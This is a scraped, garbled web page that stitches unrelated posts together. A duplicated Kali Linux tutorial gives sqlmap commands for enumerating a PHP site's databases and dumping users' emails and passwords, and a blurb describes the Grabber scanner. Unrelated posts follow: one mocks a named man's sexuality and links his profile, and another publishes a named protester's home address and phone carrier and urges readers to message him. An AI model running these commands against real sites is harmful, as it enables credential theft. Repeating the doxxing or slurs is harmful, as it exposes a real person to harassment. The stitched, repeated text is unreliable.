Exploit SQL Injection Using Sqlmap in kali linux

SQL injection : it is an attack that exploits non-parametrized SQL queries in a database , so that the attacker can insert their own queries.
Sqlmap : This is a very powerful penetration test tool (open source) , it automates the discovery and exploitation of vulnerabilities to SQL injection attacks. It has many functions , and included features such as detecting DBMS, databases, tables , columns, retrieve data and even take control of a database.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
The following tutorial was made with a  linux system ( kali linux ).
First we need a target to do this ,
go to your test website in this example we have used a PHP one, we then navigate between pages, when you see ” php? Id ” in the address bar , copy the address.
open your terminal and type this :
sqlmap –u www.site.com/product.php?catid=5  – -dbs
5
when sqlmap is done, it will tell you the Mysql version and some other information about the database.

Exploit SQL Injection Using Sqlmap in kali linux

SQL injection : it is an attack that exploits non-parametrized SQL queries in a database , so that the attacker can insert their own queries.
Sqlmap : This is a very powerful penetration test tool (open source) , it automates the discovery and exploitation of vulnerabilities to SQL injection attacks. It has many functions , and included features such as detecting DBMS, databases, tables , columns, retrieve data and even take control of a database.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
The following tutorial was made with a  linux system ( kali linux ).
First we need a target to do this ,
go to your test website in this example we have used a PHP one, we then navigate between pages, when you see ” php? Id ” in the address bar , copy the address.
open your terminal and type this :
sqlmap –u www.site.com/product.php?catid=5  – -dbs
5
when sqlmap is done, it will tell you the Mysql version and some other information about the database.

At the end of the process , it will show you databases that it has found.
to see tables that are located at the database we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart –tables 
c


The result should be something like this :
Database: acuart
[8 tables]
+———–+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+———–+
Now we have a list of tables , we need to get columns so we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users –columns

The result should be like this :f
last step we need to get data from columns , so the final command will look like this.
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password -dump
 and here’s the final result : we have got the name, mail and password:
z


At the end of the process , it will show you databases that it has found.
to see tables that are located at the database we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart –tables 

Scan website for vulnerabilities using Grabber kali-linux

Grabber is a web application scanner. Basically it detects some kind of vulnerabilities in your website. Grabber is simple, not fast but portable and really adaptable. This software is designed to scan small websites such as personals, forums etc. absolutely not big application: it would take too long time and flood your network.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you

Why this kind of application ?

This is a very small application (currently 2.5kLOC in Python) and the first reason of this scanner is to have a “minimum bar” scanner for the Samate Tool Evaluation Program at NIST.
Grabber is also for me a nice way to do some automatics verification on websites/scripts I do. Users should know some things about web vulnerabilities before using this soft because it only tell you what vulnerability it is… not how to solve it.

Current features

Because it’s a small tool, the set of vulnerabilities is small…
  1. Cross-Site Scripting
  2. SQL Injection (there is also a special Blind SQL Injection module)
  3. File Inclusion
  4. Backup files check
  5. Simple AJAX check (parse every JavaScript and get the URL and try to get the parameters)
  6. Hybrid analysis/Crystal ball testing for PHP application using PHP-SAT
  7. JavaScript source code analyzer: Evaluation of the quality/correctness of the JavaScript with JavaScript Lint
  8. Generation of a file [session_id, time(t)] for next stats analysis.
52

Does it scan the JavaScript ?

Yes! It can handle the JavaScript files, parse it to retrieve the server sides scripts names and try to get some parameters name…
This application is based on:
  1. Researchs from famous websites/guys:
    • ha.ckers.org (the XSS vector at least)
    • SPI-Dynamics lab/portal
    • Whitehatsec
    • cgisecurity.com
    • OWASP etc.
    • and a huge amount of information given by lots of tools (Pantera, Paros, Wapiti, WebInspect, Hailstorm, AppScan etc.)
  2. Python:
Grabber aim to be simple. It’s a small tool, does not provide any GUI or PDF report! There is XML reports (you can easily create a XSLT to render the XML for you manager).

Grabber usage

Spider the web application to a depth of 1 (–spider 1) and attempt SQL (–sql) and XSS (–xss) attacks at the given URL (–url http://kali-test-random-gen.com):
 0

Jagger Move Is Gay

Jagger Move 

https://plus.google.com/105487397150470506192/about

https://plus.google.com/app/basic/105487397150470506192/about

That is Jagger in the middle

James Turk Trump-Hater Spit on Flag...Exposed

Billionaire businessman Donald Trump’s campaign has been quite polarizing, as evidenced by the multiple confrontations between his supporters and those who are opposed to him — confrontations that often turn violent.
Make sure to message him and know how toy feel. 
Image result for James Turk steps on flag
James D Turk
Phone number
  • Time Warner Communications Fixed_voip
Address
  • 228 East AveSyracuse, NY 13224-1515
Image result for James Turk steps on flag
WITI reported that protesters had gathered outside a venue where Trump was holding a town hall with Fox News, and one of the anti-Trump protesters was stomping on an American flag.
James Turk said “F*** this flag, f*** this country,” the man on the flag said.”This red white and blue, this s*** is the new swastika.”aire businessman Donald Trump’s campaign has been quite polarizing, as evidenced by the multiple confrontations between his supporters and those who are opposed to him — confrontations that often turn violent.
WITI reported that protesters had gathered outside a venue where Trump was holding a town hall with Fox News, and one of the anti-Trump protesters was stomping on an American flag.
“F*** this flag, f*** this country,” the man on the flag said.”This red white and blue, this s*** is the new swastika.” Feel free to leave anytime. In fact, we’d encourage it.
american-flagWhile many in the crowd expressed outrage at the man’s actions, only one person had the courage to step forward and confront the man with a bold order.
“I want that f***ing flag off the ground right f***ing now,” he yelled.
The confrontation between the two, and the rest of the anti-Trump and Trump supporters, got so heated that police had to step in and form a line between the two camps (Caution: strong language).


Many protesters, even some from the anti-Trump crowd, were quite upset that the man was stomping on the American flag. It is his right to do so, but he is essentially stomping on the grave of every American who fought and died for the flag.